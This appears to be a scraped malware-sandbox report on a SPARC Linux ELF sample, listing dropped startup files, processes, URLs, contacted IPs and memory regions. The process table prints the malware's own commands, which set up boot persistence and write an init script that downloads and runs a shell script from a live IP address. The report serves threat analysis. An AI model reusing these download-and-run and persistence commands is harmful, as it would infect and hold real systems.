Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
sparc.nn.elf
|
ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped
|
initial sample
|
 |
|
|
/etc/init.d/sparc.nn.elf
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/etc/init.d/system
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/etc/profile
|
ASCII text
|
dropped
|
|
|
|
/etc/rc.local
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/boot/bootcmd
|
ASCII text
|
dropped
|
||
|
/etc/inittab
|
ASCII text
|
dropped
|
||
|
/etc/motd
|
ASCII text
|
dropped
|
||
|
/etc/systemd/system/custom.service
|
ASCII text
|
dropped
|
||
|
/memfd:snapd-env-generator (deleted)
|
ASCII text
|
dropped
|
||
|
/tmp/qemu-open.LWv5ue (deleted)
|
data
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
/tmp/sparc.nn.elf
|
/tmp/sparc.nn.elf
|
||
|
/tmp/sparc.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "systemctl enable custom.service >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/systemctl
|
systemctl enable custom.service
|
||
|
/tmp/sparc.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/chmod
|
chmod +x /etc/init.d/system
|
||
|
/tmp/sparc.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/ln
|
ln -s /etc/init.d/system /etc/rcS.d/S99system
|
||
|
/tmp/sparc.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "echo \"#!/bin/sh\n# /etc/init.d/sparc.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sparc.nn.elf'\n
/tmp/sparc.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n
stop)\n echo 'Stopping sparc.nn.elf'\n killall sparc.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n
*)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sparc.nn.elf"
|
||
|
/tmp/sparc.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "chmod +x /etc/init.d/sparc.nn.elf >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/chmod
|
chmod +x /etc/init.d/sparc.nn.elf
|
||
|
/tmp/sparc.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/mkdir
|
mkdir -p /etc/rc.d
|
||
|
/tmp/sparc.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "ln -s /etc/init.d/sparc.nn.elf /etc/rc.d/S99sparc.nn.elf >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/ln
|
ln -s /etc/init.d/sparc.nn.elf /etc/rc.d/S99sparc.nn.elf
|
||
|
/tmp/sparc.nn.elf
|
-
|
||
|
/tmp/sparc.nn.elf
|
-
|
||
|
/tmp/sparc.nn.elf
|
-
|
||
|
/tmp/sparc.nn.elf
|
-
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/libexec/gnome-session-binary
|
-
|
||
|
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
|
||
|
/usr/libexec/gsd-housekeeping
|
/usr/libexec/gsd-housekeeping
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
There are 36 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://94.156.227.233/curl.sh
|
unknown
|
||
|
http://94.156.227.233/lol.sh
|
unknown
|
||
|
http://94.156.227.233/oro1vk/sbin/reboot/usr/sbin/reboot/bin/reboot/usr/bin/reboot/sbin/shutdown/usr
|
unknown
|
||
|
http://94.156.227.233/
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
56.53.247.180
|
unknown
|
United States
|
||
|
172.8.105.176
|
unknown
|
United States
|
||
|
51.50.155.219
|
unknown
|
United States
|
||
|
42.1.7.110
|
unknown
|
China
|
||
|
120.201.155.40
|
unknown
|
China
|
||
|
9.40.103.1
|
unknown
|
United States
|
||
|
143.187.155.44
|
unknown
|
United States
|
||
|
58.199.26.133
|
unknown
|
China
|
||
|
161.235.68.37
|
unknown
|
United States
|
||
|
156.135.155.180
|
unknown
|
Switzerland
|
||
|
51.134.201.183
|
unknown
|
United States
|
||
|
89.192.80.161
|
unknown
|
United Kingdom
|
||
|
69.212.49.54
|
unknown
|
United States
|
||
|
213.83.3.36
|
unknown
|
Germany
|
||
|
100.154.165.96
|
unknown
|
United States
|
||
|
180.248.36.150
|
unknown
|
Indonesia
|
||
|
43.110.162.32
|
unknown
|
Japan
|
||
|
163.126.207.154
|
unknown
|
United States
|
||
|
118.183.79.243
|
unknown
|
China
|
||
|
211.206.37.159
|
unknown
|
Korea Republic of
|
||
|
84.59.209.165
|
unknown
|
Germany
|
||
|
24.201.188.225
|
unknown
|
Canada
|
||
|
211.194.178.187
|
unknown
|
Korea Republic of
|
||
|
103.7.73.55
|
unknown
|
Australia
|
||
|
41.133.75.24
|
unknown
|
South Africa
|
||
|
222.177.85.244
|
unknown
|
China
|
||
|
112.96.62.136
|
unknown
|
China
|
||
|
33.37.254.14
|
unknown
|
United States
|
||
|
124.169.207.207
|
unknown
|
Australia
|
||
|
155.161.118.83
|
unknown
|
United States
|
||
|
152.143.138.167
|
unknown
|
Germany
|
||
|
17.178.181.159
|
unknown
|
United States
|
||
|
95.160.0.144
|
unknown
|
Poland
|
||
|
182.235.250.22
|
unknown
|
Taiwan; Republic of China (ROC)
|
||
|
17.43.33.248
|
unknown
|
United States
|
||
|
100.128.95.199
|
unknown
|
United States
|
||
|
216.7.188.129
|
unknown
|
United States
|
||
|
55.43.201.235
|
unknown
|
United States
|
||
|
216.163.56.43
|
unknown
|
United States
|
||
|
142.63.192.109
|
unknown
|
Canada
|
||
|
145.226.137.228
|
unknown
|
France
|
||
|
179.172.37.130
|
unknown
|
Brazil
|
||
|
116.130.189.43
|
unknown
|
China
|
||
|
205.201.246.53
|
unknown
|
United States
|
||
|
192.197.3.165
|
unknown
|
Canada
|
||
|
202.116.206.33
|
unknown
|
China
|
||
|
119.159.59.41
|
unknown
|
Pakistan
|
||
|
155.70.244.68
|
unknown
|
United States
|
||
|
36.22.130.209
|
unknown
|
China
|
||
|
88.133.166.225
|
unknown
|
Germany
|
||
|
55.61.39.42
|
unknown
|
United States
|
||
|
216.208.90.10
|
unknown
|
Canada
|
||
|
53.47.80.47
|
unknown
|
Germany
|
||
|
108.154.170.136
|
unknown
|
United States
|
||
|
219.35.189.253
|
unknown
|
Japan
|
||
|
7.168.61.245
|
unknown
|
United States
|
||
|
57.111.236.159
|
unknown
|
Belgium
|
||
|
83.114.55.96
|
unknown
|
France
|
||
|
19.112.14.160
|
unknown
|
United States
|
||
|
193.92.15.21
|
unknown
|
Greece
|
||
|
212.203.143.217
|
unknown
|
Poland
|
||
|
153.144.36.181
|
unknown
|
Japan
|
||
|
114.102.117.216
|
unknown
|
China
|
||
|
147.71.39.134
|
unknown
|
United States
|
||
|
123.93.33.144
|
unknown
|
China
|
||
|
170.134.138.234
|
unknown
|
United States
|
||
|
153.67.143.32
|
unknown
|
United States
|
||
|
199.133.175.66
|
unknown
|
United States
|
||
|
131.62.198.222
|
unknown
|
United States
|
||
|
180.110.255.12
|
unknown
|
China
|
||
|
119.10.220.184
|
unknown
|
Japan
|
||
|
114.157.20.37
|
unknown
|
Japan
|
||
|
164.207.129.10
|
unknown
|
United States
|
||
|
19.48.207.31
|
unknown
|
United States
|
||
|
219.18.171.142
|
unknown
|
Japan
|
||
|
213.77.22.46
|
unknown
|
Poland
|
||
|
95.57.209.116
|
unknown
|
Kazakhstan
|
||
|
198.25.182.11
|
unknown
|
United States
|
||
|
91.165.102.127
|
unknown
|
France
|
||
|
84.188.60.136
|
unknown
|
Germany
|
||
|
76.38.189.120
|
unknown
|
United States
|
||
|
171.80.13.140
|
unknown
|
China
|
||
|
16.52.138.175
|
unknown
|
United States
|
||
|
202.3.246.254
|
unknown
|
French Polynesia
|
||
|
138.40.85.175
|
unknown
|
United Kingdom
|
||
|
40.217.25.101
|
unknown
|
United States
|
||
|
194.2.236.14
|
unknown
|
France
|
||
|
76.92.108.204
|
unknown
|
United States
|
||
|
4.210.58.117
|
unknown
|
United States
|
||
|
198.123.247.15
|
unknown
|
United States
|
||
|
7.13.248.90
|
unknown
|
United States
|
||
|
76.99.208.162
|
unknown
|
United States
|
||
|
201.163.94.126
|
unknown
|
Mexico
|
||
|
6.204.7.218
|
unknown
|
United States
|
||
|
18.13.111.78
|
unknown
|
United States
|
||
|
202.76.213.207
|
unknown
|
Japan
|
||
|
48.155.252.8
|
unknown
|
United States
|
||
|
220.122.39.88
|
unknown
|
Korea Republic of
|
||
|
1.229.213.67
|
unknown
|
Korea Republic of
|
||
|
156.98.176.238
|
unknown
|
United States
|
There are 90 hidden IPs, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
7fe69002c000
|
page execute read
|
|
||
|
7fe79712b000
|
page read and write
|
|||
|
7fe7982fd000
|
page read and write
|
|||
|
55d2807cb000
|
page read and write
|
|||
|
7fe790021000
|
page read and write
|
|||
|
55d27e297000
|
page execute read
|
|||
|
55d2804cc000
|
page execute and read and write
|
|||
|
7fe798426000
|
page read and write
|
|||
|
7fe798473000
|
page read and write
|
|||
|
7fe79842e000
|
page read and write
|
|||
|
7fe797f8d000
|
page read and write
|
|||
|
7ffce53c3000
|
page execute read
|
|||
|
7fe79792e000
|
page read and write
|
|||
|
55d27e4c5000
|
page read and write
|
|||
|
55d27e4ce000
|
page read and write
|
|||
|
7fe797bcb000
|
page read and write
|
|||
|
7fe797fb2000
|
page read and write
|
|||
|
7fe69003d000
|
page read and write
|
|||
|
7fe790000000
|
page read and write
|
|||
|
7ffce5368000
|
page read and write
|
|||
|
55d2804e3000
|
page read and write
|
|||
|
7fe79793c000
|
page read and write
|
|||
|
7fe690042000
|
page read and write
|
There are 13 hidden memdumps, click here to show them.